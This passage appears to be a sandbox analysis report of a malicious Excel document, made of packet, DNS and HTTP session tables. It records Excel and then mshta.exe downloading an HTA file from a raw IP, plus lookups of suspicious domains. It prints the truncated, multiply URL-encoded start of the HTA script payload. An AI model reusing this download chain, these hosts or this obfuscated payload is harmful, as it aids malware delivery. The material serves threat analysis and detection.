                                                        Oct 28, 2024 11:21:40.305125952 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305136919 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305140972 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305140972 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305146933 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305157900 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305167913 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305172920 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305179119 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305188894 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305193901 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305198908 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305203915 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305210114 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305222988 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305229902 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305233955 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305243969 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305254936 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305260897 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305262089 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305279016 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305288076 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305298090 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305299997 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305308104 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305319071 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305330038 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305335999 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305340052 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305346012 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305351973 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305361986 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305367947 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305373907 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305383921 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305391073 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305394888 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305407047 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305408001 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305424929 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305445910 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305488110 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:44.750942945 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:44.751019001 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:52.627198935 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:22:51.676835060 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:51.676881075 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:51.676928997 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:51.686137915 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:51.686165094 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.405622005 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.405744076 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.409780025 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.409813881 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.410280943 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.410342932 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.558073997 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.603349924 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.726572037 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.726639032 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.726651907 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.726675987 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.726819992 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.726820946 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.845805883 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.845933914 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.846230030 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.846314907 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.847188950 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.847278118 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.849024057 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.849112988 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.965245962 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.965348005 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.965574980 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.965650082 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.966216087 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.966317892 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.967443943 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.967550039 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.968588114 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.968664885 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.969314098 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.969402075 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.970366001 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:52.970439911 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:52.982156038 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.084590912 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.084702015 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.084867954 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.084934950 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.085051060 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.085129976 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.085644007 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.085714102 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.086528063 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.086607933 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.086705923 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.086791039 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.087193012 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.087280035 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.088054895 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.088129044 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.088239908 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.088323116 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.088877916 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.089076042 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.089148045 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.089257956 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.089335918 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.089878082 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.090114117 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.090187073 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.090295076 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.090372086 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.090394974 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.091025114 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.091109037 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.205871105 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.205970049 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.206135035 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.206208944 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.206350088 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.206425905 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.206532955 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.206605911 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.206651926 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.206702948 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.206728935 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.206789017 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.207019091 CET49168443192.168.2.22199.217.106.226
                                                        Oct 28, 2024 11:22:53.207305908 CET44349168199.217.106.226192.168.2.22
                                                        Oct 28, 2024 11:22:53.207381964 CET49168443192.168.2.22199.217.106.226
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 28, 2024 11:21:25.336014032 CET5456253192.168.2.228.8.8.8
                                                        Oct 28, 2024 11:21:25.347821951 CET53545628.8.8.8192.168.2.22
                                                        Oct 28, 2024 11:21:27.995496035 CET5291753192.168.2.228.8.8.8
                                                        Oct 28, 2024 11:21:28.006747961 CET53529178.8.8.8192.168.2.22
                                                        Oct 28, 2024 11:22:51.222918987 CET6275153192.168.2.228.8.8.8
                                                        Oct 28, 2024 11:22:51.435055971 CET53627518.8.8.8192.168.2.22
                                                        Oct 28, 2024 11:22:51.435405970 CET6275153192.168.2.228.8.8.8
                                                        Oct 28, 2024 11:22:51.649844885 CET53627518.8.8.8192.168.2.22
                                                        Oct 28, 2024 11:22:51.650089025 CET6275153192.168.2.228.8.8.8
                                                        Oct 28, 2024 11:22:51.657910109 CET53627518.8.8.8192.168.2.22
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 28, 2024 11:21:25.336014032 CET192.168.2.228.8.8.80x1116Standard query (0)qrisni.meA (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:21:27.995496035 CET192.168.2.228.8.8.80xab34Standard query (0)qrisni.meA (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.222918987 CET192.168.2.228.8.8.80xad27Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.435405970 CET192.168.2.228.8.8.80xad27Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.650089025 CET192.168.2.228.8.8.80xad27Standard query (0)www.bookinginfo.asiaA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 28, 2024 11:21:25.347821951 CET8.8.8.8192.168.2.220x1116No error (0)qrisni.me188.114.96.3A (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:21:25.347821951 CET8.8.8.8192.168.2.220x1116No error (0)qrisni.me188.114.97.3A (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:21:28.006747961 CET8.8.8.8192.168.2.220xab34No error (0)qrisni.me188.114.96.3A (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:21:28.006747961 CET8.8.8.8192.168.2.220xab34No error (0)qrisni.me188.114.97.3A (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.435055971 CET8.8.8.8192.168.2.220xad27No error (0)www.bookinginfo.asiabookinginfo.asiaCNAME (Canonical name)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.435055971 CET8.8.8.8192.168.2.220xad27No error (0)bookinginfo.asia199.217.106.226A (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.649844885 CET8.8.8.8192.168.2.220xad27No error (0)www.bookinginfo.asiabookinginfo.asiaCNAME (Canonical name)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.649844885 CET8.8.8.8192.168.2.220xad27No error (0)bookinginfo.asia199.217.106.226A (IP address)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.657910109 CET8.8.8.8192.168.2.220xad27No error (0)www.bookinginfo.asiabookinginfo.asiaCNAME (Canonical name)IN (0x0001)false
                                                        Oct 28, 2024 11:22:51.657910109 CET8.8.8.8192.168.2.220xad27No error (0)bookinginfo.asia199.217.106.226A (IP address)IN (0x0001)false
                                                        • qrisni.me
                                                        • www.bookinginfo.asia
                                                        • 107.175.113.214
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.2249164107.175.113.214803344C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
                                                        Oct 28, 2024 11:21:26.990380049 CET391OUTGET /xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: 107.175.113.214
                                                        Connection: Keep-Alive
                                                        Oct 28, 2024 11:21:27.619060993 CET1236INHTTP/1.1 200 OK
                                                        Date: Mon, 28 Oct 2024 10:21:27 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Mon, 28 Oct 2024 04:24:44 GMT
                                                        ETag: "20c63-62581d920ba93"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 134243
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/hta
                                                        Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 [TRUNCATED]
                                                        Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCRipt%252520lanGuage%25253D%252522VbsCripT%252522%25253E%25250AdIm%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                        Oct 28, 2024 11:21:27.619107962 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                        Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                        Oct 28, 2024 11:21:27.619159937 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                        Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                        Oct 28, 2024 11:21:27.619195938 CET636INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                        Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                        Oct 28, 2024 11:21:27.619231939 CET1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                        Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                        Oct 28, 2024 11:21:27.619266987 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                        Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                        Oct 28, 2024 11:21:27.619303942 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                        Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                        Oct 28, 2024 11:21:27.619354963 CET1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                        Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                        Oct 28, 2024 11:21:27.619390965 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                        Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                        Oct 28, 2024 11:21:27.619410992 CET1060INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                        Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                        Oct 28, 2024 11:21:27.625298977 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                        Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.2249166107.175.113.214803612C:\Windows\System32\mshta.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 28, 2024 11:21:29.972815037 CET468OUTGET /xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Range: bytes=8896-
                                                        Connection: Keep-Alive
                                                        Host: 107.175.113.214
                                                        If-Range: "20c63-62581d920ba93"
                                                        Oct 28, 2024 11:21:30.631392002 CET1236INHTTP/1.1 206 Partial Content
                                                        Date: Mon, 28 Oct 2024 10:21:30 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Mon, 28 Oct 2024 04:24:44 GMT
                                                        ETag: "20c63-62581d920ba93"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 125347
                                                        Content-Range: bytes 8896-134242/134243
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/hta
                                                        Data Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 [TRUNCATED]
                                                        Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%25
                                                        Oct 28, 2024 11:21:30.631455898 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                        Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
